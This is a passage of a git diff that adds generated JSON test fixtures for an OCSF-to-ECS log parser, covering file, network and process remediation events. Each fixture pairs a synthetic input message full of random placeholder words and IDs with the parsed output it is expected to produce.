\"Medium\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700204, \"type_name\": \"File Remediation Activity: Harden\", \"observables\": [{\"name\": \"font earlier construction\", \"type\": \"Hash\", \"type_id\": 8}, {\"name\": \"outdoors de otherwise\", \"type\": \"Unknown\", \"type_id\": 0}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 94, \"activity_name\": \"Harden\", \"command_uid\": \"a6340542-a029-11ef-ab83-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a633df68-a029-11ef-b6df-0242ac110007\"}, \"d3f_technique\": {\"name\": \"tgp adrian reject\", \"uid\": \"a633ef26-a029-11ef-ae66-0242ac110007\", \"src_url\": \"productions\"}}], \"severity_id\": 3, \"status_code\": \"lover\", \"status_detail\": \"declared chassis nominations\"}" + }, + "expected": { + "message": "{\"message\": \"oils tissue non\", \"status\": \"bottle threads desktop\", \"time\": 1731328621430, \"file\": {\"attributes\": 77, \"name\": \"panama.jsp\", \"type\": \"Unknown\", \"version\": \"1.3.0\", \"path\": \"sage petite tracy/supplement.deskthemepack/panama.jsp\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"issuer\": \"shaw further heaven\", \"fingerprints\": [{\"value\": \"25CF2FBFB6A4C58B9886BFD82A9D9D32976450F5B95B193B1F8F91071FCE9032\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731328621426, \"expiration_time\": 1731328621426, \"serial_number\": \"museum every fa\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"sims faculty argue\", \"uid\": \"a6338964-a029-11ef-9cb6-0242ac110007\", \"type_id\": 0, \"parent_folder\": \"sage petite tracy/supplement.deskthemepack\", \"accessed_time\": 1731328621427, \"hashes\": [{\"value\": \"1051E22C1288CD1DD4B35D7D119F9D9E764B37C2050E8086C3F8AADBE48E8459\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"2A598E60AFB25F3005C1949A4AE28E75A5E24C34375D709852748D46D50E19DBF4AD93722613E77084B214B0C8F931F2EFF7B1AA9AF17B97F3D50770D0C328DB\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"determine italia plenty\", \"version\": \"1.3.0\", \"uid\": \"a6331254-a029-11ef-a2ea-0242ac110007\"}, \"product\": {\"name\": \"board actor feels\", \"version\": \"1.3.0\", \"uid\": \"a6334788-a029-11ef-8ba2-0242ac110007\", \"vendor_name\": \"resume himself vitamin\"}, \"uid\": \"a63350e8-a029-11ef-91d8-0242ac110007\", \"profiles\": [], \"correlation_uid\": \"a63357c8-a029-11ef-a1d1-0242ac110007\", \"log_name\": \"movements amazing murphy\", \"log_provider\": \"suggests assure sacred\", \"original_time\": \"narrative shed quit\", \"tenant_uid\": \"a63361a0-a029-11ef-b41a-0242ac110007\"}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700204, \"type_name\": \"File Remediation Activity: Harden\", \"observables\": [{\"name\": \"font earlier construction\", \"type\": \"Hash\", \"type_id\": 8}, {\"name\": \"outdoors de otherwise\", \"type\": \"Unknown\", \"type_id\": 0}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 94, \"activity_name\": \"Harden\", \"command_uid\": \"a6340542-a029-11ef-ab83-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a633df68-a029-11ef-b6df-0242ac110007\"}, \"d3f_technique\": {\"name\": \"tgp adrian reject\", \"uid\": \"a633ef26-a029-11ef-ae66-0242ac110007\", \"src_url\": \"productions\"}}], \"severity_id\": 3, \"status_code\": \"lover\", \"status_detail\": \"declared chassis nominations\"}", + "event": { + "action": "harden", + "category": [], + "provider": "suggests assure sacred", + "reason": "oils tissue non", + "severity": 3, + "type": [] + }, + "@timestamp": "2024-11-11T12:37:01.430000Z", + "file": { + "accessed": "2024-11-11T12:37:01.427000Z", + "directory": "sage petite tracy/supplement.deskthemepack", + "inode": "a6338964-a029-11ef-9cb6-0242ac110007", + "name": "panama.jsp", + "path": "sage petite tracy/supplement.deskthemepack/panama.jsp", + "type": "Unknown", + "x509": { + "issuer": { + "distinguished_name": "shaw further heaven" + }, + "not_after": "2024-11-11T12:37:01.426000Z", + "serial_number": "museum every fa", + "version_number": "1.3.0" + } + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Harden", + "class_name": "File Remediation Activity", + "class_uid": 7002 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_3.json b/OCSF/ocsf/tests/generated_file_remediation_activity_3.json new file mode 100644 index 000000000..35f27d49f --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_3.json @@ -0,0 +1,43 @@ +{ + "input": { + "message": "{\"message\": \"baker testimonials approx\", \"status\": \"Error\", \"time\": 1731328627583, \"file\": {\"attributes\": 65, \"name\": \"brazilian.tar.gz\", \"owner\": {\"name\": \"Enrolled\", \"type\": \"Unknown\", \"uid\": \"a9de1552-a029-11ef-9be5-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"a9de21c8-a029-11ef-a4ce-0242ac110007\", \"uid_alt\": \"camel license fl\"}, \"type\": \"Regular File\", \"path\": \"violin economic czech/regular.accdb/brazilian.tar.gz\", \"product\": {\"name\": \"just philippines startup\", \"version\": \"1.3.0\", \"uid\": \"a9de4ec8-a029-11ef-96ee-0242ac110007\", \"feature\": {\"name\": \"metro municipality egypt\", \"version\": \"1.3.0\", \"uid\": \"a9de59f4-a029-11ef-8d34-0242ac110007\"}, \"cpe_name\": \"highly os treated\", \"vendor_name\": \"candidates etc beverage\"}, \"ext\": \"labels oriental websites\", \"type_id\": 1, \"creator\": {\"name\": \"Templates\", \"uid\": \"a9deb516-a029-11ef-8430-0242ac110007\", \"org\": {\"name\": \"welfare philip fathers\", \"uid\": \"a9dec100-a029-11ef-986c-0242ac110007\", \"ou_name\": \"threat supporting pension\"}, \"email_addr\": \"Tabetha@programmers.arpa\"}, \"mime_type\": \"agree/diego\", \"parent_folder\": \"violin economic czech/regular.accdb\", \"hashes\": [{\"value\": \"23BF00BD8ADB4469651EB5D5C47027D49C53BB2D\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"4F80D2DFFF57658A1076FF2F74282A97BB0B6574\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"conventional indexes merit\", \"version\": \"1.3.0\", \"uid\": \"a9dc7224-a029-11ef-ae98-0242ac110007\"}, \"product\": {\"name\": \"zimbabwe meals purchase\", \"version\": \"1.3.0\", \"uid\": \"a9dcfdac-a029-11ef-aa8a-0242ac110007\", \"vendor_name\": \"status hole consider\"}, \"profiles\": [], \"log_name\": \"attorney destinations evolution\", \"log_provider\": \"sections sides trembl\", \"modified_time\": 1731328627575, \"original_time\": \"coalition polyphonic limit\", \"tenant_uid\": \"a9ddd8d0-a029-11ef-a422-0242ac110007\"}, \"scan\": {\"name\": \"nd lawn seeking\", \"type\": \"Updated Content\", \"uid\": \"a9ddf644-a029-11ef-b1ea-0242ac110007\", \"type_id\": 3}, \"severity\": \"Unknown\", \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"activity_name\": \"Evict\", \"command_uid\": \"a9deee3c-a029-11ef-8d19-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a9ded82a-a029-11ef-9aed-0242ac110007\"}, \"d3f_technique\": {\"name\": \"collecting monte craps\", \"uid\": \"a9dee1da-a029-11ef-b734-0242ac110007\"}}], \"severity_id\": 0, \"status_code\": \"holes\", \"status_detail\": \"payroll perfectly prospective\", \"status_id\": 6}" + }, + "expected": { + "message": "{\"message\": \"baker testimonials approx\", \"status\": \"Error\", \"time\": 1731328627583, \"file\": {\"attributes\": 65, \"name\": \"brazilian.tar.gz\", \"owner\": {\"name\": \"Enrolled\", \"type\": \"Unknown\", \"uid\": \"a9de1552-a029-11ef-9be5-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"a9de21c8-a029-11ef-a4ce-0242ac110007\", \"uid_alt\": \"camel license fl\"}, \"type\": \"Regular File\", \"path\": \"violin economic czech/regular.accdb/brazilian.tar.gz\", \"product\": {\"name\": \"just philippines startup\", \"version\": \"1.3.0\", \"uid\": \"a9de4ec8-a029-11ef-96ee-0242ac110007\", \"feature\": {\"name\": \"metro municipality egypt\", \"version\": \"1.3.0\", \"uid\": \"a9de59f4-a029-11ef-8d34-0242ac110007\"}, \"cpe_name\": \"highly os treated\", \"vendor_name\": \"candidates etc beverage\"}, \"ext\": \"labels oriental websites\", \"type_id\": 1, \"creator\": {\"name\": \"Templates\", \"uid\": \"a9deb516-a029-11ef-8430-0242ac110007\", \"org\": {\"name\": \"welfare philip fathers\", \"uid\": \"a9dec100-a029-11ef-986c-0242ac110007\", \"ou_name\": \"threat supporting pension\"}, \"email_addr\": \"Tabetha@programmers.arpa\"}, \"mime_type\": \"agree/diego\", \"parent_folder\": \"violin economic czech/regular.accdb\", \"hashes\": [{\"value\": \"23BF00BD8ADB4469651EB5D5C47027D49C53BB2D\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"4F80D2DFFF57658A1076FF2F74282A97BB0B6574\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"conventional indexes merit\", \"version\": \"1.3.0\", \"uid\": \"a9dc7224-a029-11ef-ae98-0242ac110007\"}, \"product\": {\"name\": \"zimbabwe meals purchase\", \"version\": \"1.3.0\", \"uid\": \"a9dcfdac-a029-11ef-aa8a-0242ac110007\", \"vendor_name\": \"status hole consider\"}, \"profiles\": [], \"log_name\": \"attorney destinations evolution\", \"log_provider\": \"sections sides trembl\", \"modified_time\": 1731328627575, \"original_time\": \"coalition polyphonic limit\", \"tenant_uid\": \"a9ddd8d0-a029-11ef-a422-0242ac110007\"}, \"scan\": {\"name\": \"nd lawn seeking\", \"type\": \"Updated Content\", \"uid\": \"a9ddf644-a029-11ef-b1ea-0242ac110007\", \"type_id\": 3}, \"severity\": \"Unknown\", \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"activity_name\": \"Evict\", \"command_uid\": \"a9deee3c-a029-11ef-8d19-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a9ded82a-a029-11ef-9aed-0242ac110007\"}, \"d3f_technique\": {\"name\": \"collecting monte craps\", \"uid\": \"a9dee1da-a029-11ef-b734-0242ac110007\"}}], \"severity_id\": 0, \"status_code\": \"holes\", \"status_detail\": \"payroll perfectly prospective\", \"status_id\": 6}", + "event": { + "action": "evict", + "category": [], + "provider": "sections sides trembl", + "reason": "baker testimonials approx", + "severity": 0, + "type": [] + }, + "@timestamp": "2024-11-11T12:37:07.583000Z", + "file": { + "directory": "violin economic czech/regular.accdb", + "hash": { + "sha1": "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D4F80D2DFFF57658A1076FF2F74282A97BB0B6574" + }, + "mime_type": "agree/diego", + "name": "brazilian.tar.gz", + "owner": "Enrolled", + "path": "violin economic czech/regular.accdb/brazilian.tar.gz", + "type": "Regular File", + "uid": "a9de1552-a029-11ef-9be5-0242ac110007" + }, + "ocsf": { + "activity_id": 2, + "activity_name": "Evict", + "class_name": "File Remediation Activity", + "class_uid": 7002 + }, + "related": { + "hash": [ + "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D4F80D2DFFF57658A1076FF2F74282A97BB0B6574" + ], + "user": [ + "Enrolled" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_network_remediation_activity_1.json b/OCSF/ocsf/tests/generated_network_remediation_activity_1.json new file mode 100644 index 000000000..4209eb1be --- /dev/null +++ b/OCSF/ocsf/tests/generated_network_remediation_activity_1.json @@ -0,0 +1,29 @@ +{ + "input": { + "message": "{\"message\": \"kills routine cookie\", \"status\": \"Error\", \"time\": 1731331184401, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"consoles paste democrats\", \"version\": \"1.3.0\", \"uid\": \"9dd714a6-a02f-11ef-a375-0242ac110007\"}, \"product\": {\"name\": \"strip milton message\", \"uid\": \"9dd78440-a02f-11ef-9b45-0242ac110007\", \"feature\": {\"name\": \"dealing instruction glasgow\", \"version\": \"1.3.0\", \"uid\": \"9dd7bc30-a02f-11ef-a841-0242ac110007\"}, \"vendor_name\": \"praise profit voyeurweb\"}, \"uid\": \"9dd80514-a02f-11ef-ad38-0242ac110007\", \"profiles\": [], \"log_name\": \"mens coverage sustained\", \"log_provider\": \"expertise browse courier\", \"logged_time\": 1731331184386, \"original_time\": \"sauce female resulted\", \"tenant_uid\": \"9dd8901a-a02f-11ef-b542-0242ac110007\"}, \"connection_info\": {\"uid\": \"9dd8e524-a02f-11ef-a212-0242ac110007\", \"boundary\": \"Unknown\", \"protocol_name\": \"notion expressed postcards\", \"direction\": \"Outbound\", \"boundary_id\": 0, \"direction_id\": 2, \"protocol_num\": 62, \"protocol_ver\": \"pricing\", \"protocol_ver_id\": 99, \"tcp_flags\": 39}, \"severity\": \"High\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"pricing pope defendant\", \"type\": \"Process Name\", \"type_id\": 9}, {\"name\": \"fail long monthly\", \"type\": \"Resource UID\", \"type_id\": 10, \"reputation\": {\"base_score\": 5.3863, \"provider\": \"finally responding daughter\", \"score\": \"Probably Safe\", \"score_id\": 3}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 79, \"activity_name\": \"Restore\", \"command_uid\": \"9ddaa616-a02f-11ef-bdaf-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"9dd9bdc8-a02f-11ef-a7a3-0242ac110007\"}, \"d3f_technique\": {\"name\": \"informal statistics lcd\", \"uid\": \"9dda024c-a02f-11ef-938d-0242ac110007\"}}], \"severity_id\": 4, \"status_code\": \"cds\", \"status_id\": 6}" + }, + "expected": { + "message": "{\"message\": \"kills routine cookie\", \"status\": \"Error\", \"time\": 1731331184401, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"consoles paste democrats\", \"version\": \"1.3.0\", \"uid\": \"9dd714a6-a02f-11ef-a375-0242ac110007\"}, \"product\": {\"name\": \"strip milton message\", \"uid\": \"9dd78440-a02f-11ef-9b45-0242ac110007\", \"feature\": {\"name\": \"dealing instruction glasgow\", \"version\": \"1.3.0\", \"uid\": \"9dd7bc30-a02f-11ef-a841-0242ac110007\"}, \"vendor_name\": \"praise profit voyeurweb\"}, \"uid\": \"9dd80514-a02f-11ef-ad38-0242ac110007\", \"profiles\": [], \"log_name\": \"mens coverage sustained\", \"log_provider\": \"expertise browse courier\", \"logged_time\": 1731331184386, \"original_time\": \"sauce female resulted\", \"tenant_uid\": \"9dd8901a-a02f-11ef-b542-0242ac110007\"}, \"connection_info\": {\"uid\": \"9dd8e524-a02f-11ef-a212-0242ac110007\", \"boundary\": \"Unknown\", \"protocol_name\": \"notion expressed postcards\", \"direction\": \"Outbound\", \"boundary_id\": 0, \"direction_id\": 2, \"protocol_num\": 62, \"protocol_ver\": \"pricing\", \"protocol_ver_id\": 99, \"tcp_flags\": 39}, \"severity\": \"High\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"pricing pope defendant\", \"type\": \"Process Name\", \"type_id\": 9}, {\"name\": \"fail long monthly\", \"type\": \"Resource UID\", \"type_id\": 10, \"reputation\": {\"base_score\": 5.3863, \"provider\": \"finally responding daughter\", \"score\": \"Probably Safe\", \"score_id\": 3}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 79, \"activity_name\": \"Restore\", \"command_uid\": \"9ddaa616-a02f-11ef-bdaf-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"9dd9bdc8-a02f-11ef-a7a3-0242ac110007\"}, \"d3f_technique\": {\"name\": \"informal statistics lcd\", \"uid\": \"9dda024c-a02f-11ef-938d-0242ac110007\"}}], \"severity_id\": 4, \"status_code\": \"cds\", \"status_id\": 6}", + "event": { + "action": "restore", + "category": [], + "provider": "expertise browse courier", + "reason": "kills routine cookie", + "severity": 4, + "type": [] + }, + "@timestamp": "2024-11-11T13:19:44.401000Z", + "network": { + "direction": [ + "unknown" + ], + "iana_number": "62" + }, + "ocsf": { + "activity_id": 3, + "activity_name": "Restore", + "class_name": "Network Remediation Activity", + "class_uid": 7004 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_network_remediation_activity_2.json b/OCSF/ocsf/tests/generated_network_remediation_activity_2.json new file mode 100644 index 000000000..afc4afcbe --- /dev/null +++ b/OCSF/ocsf/tests/generated_network_remediation_activity_2.json @@ -0,0 +1,30 @@ +{ + "input": { + "message": "{\"count\": 70, \"message\": \"virtue carb keeps\", \"status\": \"Unknown\", \"time\": 1731331194181, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"subjective myself systems\", \"version\": \"1.3.0\", \"uid\": \"a3ac922a-a02f-11ef-984c-0242ac110007\", \"feature\": {\"name\": \"seafood zen attacks\", \"version\": \"1.3.0\", \"uid\": \"a3ad2ca8-a02f-11ef-a741-0242ac110007\"}, \"vendor_name\": \"sullivan participation wired\"}, \"extensions\": [{\"name\": \"faq valuable theory\", \"version\": \"1.3.0\", \"uid\": \"a3ad55ac-a02f-11ef-9d32-0242ac110007\"}, {\"name\": \"diesel salmon graduates\", \"version\": \"1.3.0\", \"uid\": \"a3ad70e6-a02f-11ef-be20-0242ac110007\"}], \"profiles\": [], \"log_name\": \"influence increasing towers\", \"log_provider\": \"defence ignore carroll\", \"original_time\": \"baths ends led\", \"tenant_uid\": \"a3ad8d56-a02f-11ef-a66b-0242ac110007\"}, \"scan\": {\"name\": \"fits educated vip\", \"type\": \"Attached Media\", \"uid\": \"a3ae1122-a02f-11ef-b0ef-0242ac110007\", \"type_id\": 5}, \"connection_info\": {\"uid\": \"a3ae3c42-a02f-11ef-bdd6-0242ac110007\", \"boundary\": \"Internet Gateway\", \"protocol_name\": \"nuts oriented data\", \"direction\": \"Inbound\", \"boundary_id\": 11, \"direction_id\": 1, \"protocol_num\": 88, \"protocol_ver\": \"Unknown\", \"protocol_ver_id\": 0}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"catherine lawsuit wash\", \"type\": \"File Name\", \"value\": \"underwear img tp\", \"type_id\": 7}, {\"name\": \"drawn vol buy\", \"type\": \"Email Address\", \"type_id\": 5, \"reputation\": {\"base_score\": 40.1815, \"provider\": \"miscellaneous applying places\", \"score\": \"tapes\", \"score_id\": 99}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 96, \"activity_name\": \"Restore\", \"command_uid\": \"a3aecf68-a02f-11ef-b5f1-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a3ae8698-a02f-11ef-a4fc-0242ac110007\", \"src_url\": \"weak\"}, \"d3f_technique\": {\"name\": \"gratuit refused endorsed\", \"uid\": \"a3ae95ac-a02f-11ef-b756-0242ac110007\"}}], \"enrichments\": [{\"data\": \"year\", \"name\": \"terry acceptance unavailable\", \"type\": \"me mo fetish\", \"value\": \"ride restore bearing\", \"created_time\": 1731331194181, \"provider\": \"illinois ferrari samuel\", \"reputation\": {\"base_score\": 43.1915, \"provider\": \"view rankings um\", \"score\": \"Very Safe\", \"score_id\": 1}, \"short_desc\": \"uganda pose worse\", \"src_url\": \"aluminium\"}, {\"data\": \"funky\", \"name\": \"italic electrical successfully\", \"type\": \"ethnic hitachi stevens\", \"value\": \"steven m rogers\", \"desc\": \"digital jeffrey rogers\", \"created_time\": 1731331194181, \"short_desc\": \"cook psi jobs\", \"src_url\": \"hp\"}], \"severity_id\": 3, \"status_code\": \"professionals\", \"status_detail\": \"affiliated carries publications\", \"status_id\": 0}" + }, + "expected": { + "message": "{\"count\": 70, \"message\": \"virtue carb keeps\", \"status\": \"Unknown\", \"time\": 1731331194181, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"subjective myself systems\", \"version\": \"1.3.0\", \"uid\": \"a3ac922a-a02f-11ef-984c-0242ac110007\", \"feature\": {\"name\": \"seafood zen attacks\", \"version\": \"1.3.0\", \"uid\": \"a3ad2ca8-a02f-11ef-a741-0242ac110007\"}, \"vendor_name\": \"sullivan participation wired\"}, \"extensions\": [{\"name\": \"faq valuable theory\", \"version\": \"1.3.0\", \"uid\": \"a3ad55ac-a02f-11ef-9d32-0242ac110007\"}, {\"name\": \"diesel salmon graduates\", \"version\": \"1.3.0\", \"uid\": \"a3ad70e6-a02f-11ef-be20-0242ac110007\"}], \"profiles\": [], \"log_name\": \"influence increasing towers\", \"log_provider\": \"defence ignore carroll\", \"original_time\": \"baths ends led\", \"tenant_uid\": \"a3ad8d56-a02f-11ef-a66b-0242ac110007\"}, \"scan\": {\"name\": \"fits educated vip\", \"type\": \"Attached Media\", \"uid\": \"a3ae1122-a02f-11ef-b0ef-0242ac110007\", \"type_id\": 5}, \"connection_info\": {\"uid\": \"a3ae3c42-a02f-11ef-bdd6-0242ac110007\", \"boundary\": \"Internet Gateway\", \"protocol_name\": \"nuts oriented data\", \"direction\": \"Inbound\", \"boundary_id\": 11, \"direction_id\": 1, \"protocol_num\": 88, \"protocol_ver\": \"Unknown\", \"protocol_ver_id\": 0}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"catherine lawsuit wash\", \"type\": \"File Name\", \"value\": \"underwear img tp\", \"type_id\": 7}, {\"name\": \"drawn vol buy\", \"type\": \"Email Address\", \"type_id\": 5, \"reputation\": {\"base_score\": 40.1815, \"provider\": \"miscellaneous applying places\", \"score\": \"tapes\", \"score_id\": 99}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 96, \"activity_name\": \"Restore\", \"command_uid\": \"a3aecf68-a02f-11ef-b5f1-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a3ae8698-a02f-11ef-a4fc-0242ac110007\", \"src_url\": \"weak\"}, \"d3f_technique\": {\"name\": \"gratuit refused endorsed\", \"uid\": \"a3ae95ac-a02f-11ef-b756-0242ac110007\"}}], \"enrichments\": [{\"data\": \"year\", \"name\": \"terry acceptance unavailable\", \"type\": \"me mo fetish\", \"value\": \"ride restore bearing\", \"created_time\": 1731331194181, \"provider\": \"illinois ferrari samuel\", \"reputation\": {\"base_score\": 43.1915, \"provider\": \"view rankings um\", \"score\": \"Very Safe\", \"score_id\": 1}, \"short_desc\": \"uganda pose worse\", \"src_url\": \"aluminium\"}, {\"data\": \"funky\", \"name\": \"italic electrical successfully\", \"type\": \"ethnic hitachi stevens\", \"value\": \"steven m rogers\", \"desc\": \"digital jeffrey rogers\", \"created_time\": 1731331194181, \"short_desc\": \"cook psi jobs\", \"src_url\": \"hp\"}], \"severity_id\": 3, \"status_code\": \"professionals\", \"status_detail\": \"affiliated carries publications\", \"status_id\": 0}", + "event": { + "action": "restore", + "category": [], + "outcome": "unknown", + "provider": "defence ignore carroll", + "reason": "virtue carb keeps", + "severity": 3, + "type": [] + }, + "@timestamp": "2024-11-11T13:19:54.181000Z", + "network": { + "direction": [ + "inbound" + ], + "iana_number": "88" + }, + "ocsf": { + "activity_id": 3, + "activity_name": "Restore", + "class_name": "Network Remediation Activity", + "class_uid": 7004 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_process_remediation_activity_1.json b/OCSF/ocsf/tests/generated_process_remediation_activity_1.json new file mode 100644 index 000000000..ac2f48c8a --- /dev/null +++ b/OCSF/ocsf/tests/generated_process_remediation_activity_1.json @@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"message\": \"heaven country sugar\", \"process\": {\"name\": \"Success\", \"pid\": 94, \"file\": {\"name\": \"earliest.pdb\", \"owner\": {\"name\": \"Tee\", \"type\": \"Unknown\", \"domain\": \"term assembled gossip\", \"uid\": \"223ad95e-a02f-11ef-8523-0242ac110007\", \"type_id\": 0, \"full_name\": \"Kaycee Valarie\", \"risk_level\": \"orleans medicines legal\"}, \"type\": \"Regular File\", \"path\": \"guilty different comply/expects.accdb/earliest.pdb\", \"desc\": \"prominent purse jones\", \"ext\": \"rendered ministry investigators\", \"type_id\": 1, \"parent_folder\": \"guilty different comply/expects.accdb\", \"hashes\": [{\"value\": \"EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"name\": \"Livestock\", \"type\": \"Admin\", \"uid\": \"223aed7c-a02f-11ef-943c-0242ac110007\", \"type_id\": 2, \"risk_level\": \"sense\", \"risk_level_id\": 99}, \"loaded_modules\": [\"/offered/her/msg/vegetarian/bizarre.html\", \"/principle/setting/liz/defendant/herself.wsf\"], \"cmd_line\": \"guided stretch phrases\", \"created_time\": 1731330976996, \"parent_process\": {\"name\": \"Em\", \"pid\": 60, \"file\": {\"name\": \"texas.rss\", \"type\": \"Regular File\", \"path\": \"pipeline memorabilia wednesday/lindsay.thm/texas.rss\", \"product\": {\"name\": \"rather rate cms\", \"version\": \"1.3.0\", \"uid\": \"223b1036-a02f-11ef-a666-0242ac110007\", \"lang\": \"en\", \"vendor_name\": \"assistance printers careful\"}, \"uid\": \"223b1766-a02f-11ef-b077-0242ac110007\", \"ext\": \"around clear funk\", \"type_id\": 1, \"parent_folder\": \"pipeline memorabilia wednesday/lindsay.thm\", \"accessed_time\": 1731330976998, \"hashes\": [{\"value\": \"0C9582BD64D9BAB6B4D907C275F45B5D3FC0035986E6294724E7FC4C77A9E16F42AD975BA9F5AD3884CCEFB2635640629F2AA538C5FDA52E2D872D3B73F65C6C\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"31FEBEB59C135F276A56FF06D2A3B00B982685E2D8EF3205B97EB80E0F4DCDC3\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"name\": \"Membership\", \"type\": \"System\", \"uid\": \"223b30c0-a02f-11ef-87cb-0242ac110007\", \"type_id\": 3, \"full_name\": \"Anita Rosanna\", \"email_addr\": \"Li@scientific.travel\"}, \"uid\": \"223b4aa6-a02f-11ef-9d39-0242ac110007\", \"cmd_line\": \"suits chris sega\", \"created_time\": 1731330976999, \"lineage\": [\"alternative consistently improved\", \"cats charm hardcover\"], \"parent_process\": {\"name\": \"Humor\", \"pid\": 26, \"file\": {\"name\": \"incorrect.gadget\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"upset india relax/marie.3gp/incorrect.gadget\", \"product\": {\"name\": \"grades internationally ordinary\", \"version\": \"1.3.0\", \"uid\": \"223b9d6c-a02f-11ef-af12-0242ac110007\", \"feature\": {\"name\": \"motivation bridges other\", \"version\": \"1.3.0\", \"uid\": \"223bade8-a02f-11ef-a579-0242ac110007\"}, \"vendor_name\": \"lightweight monday station\"}, \"uid\": \"223bb4f0-a02f-11ef-9470-0242ac110007\", \"ext\": \"celebrities intelligent david\", \"type_id\": 1, \"accessor\": {\"name\": \"Institutes\", \"type\": \"User\", \"uid\": \"223bc1b6-a02f-11ef-be06-0242ac110007\", \"org\": {\"uid\": \"223bcfee-a02f-11ef-9eaf-0242ac110007\", \"ou_name\": \"sixth rats hawk\"}, \"type_id\": 1, \"account\": {\"name\": \"fairy clause literally\", \"uid\": \"223be3a8-a02f-11ef-b63a-0242ac110007\"}, \"credential_uid\": \"223befc4-a02f-11ef-9ee4-0242ac110007\", \"ldap_person\": {\"email_addrs\": [\"Suzann@verbal.biz\", \"Flo@submissions.int\"], \"last_login_time\": 1731330977003, \"leave_time\": 1731330977003}, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 44}, \"parent_folder\": \"upset india relax/marie.3gp\", \"hashes\": [{\"value\": \"4B300F704B4BD8E100BDB3CAB1031A6CEDCB68FBC2C3606B1178586034AF4ECAC9A514E1A67728708F5FAD5AD1FC04AE78ECA412443352AF94457FEC9581ED11\", \"algorithm\": \"Unknown\", 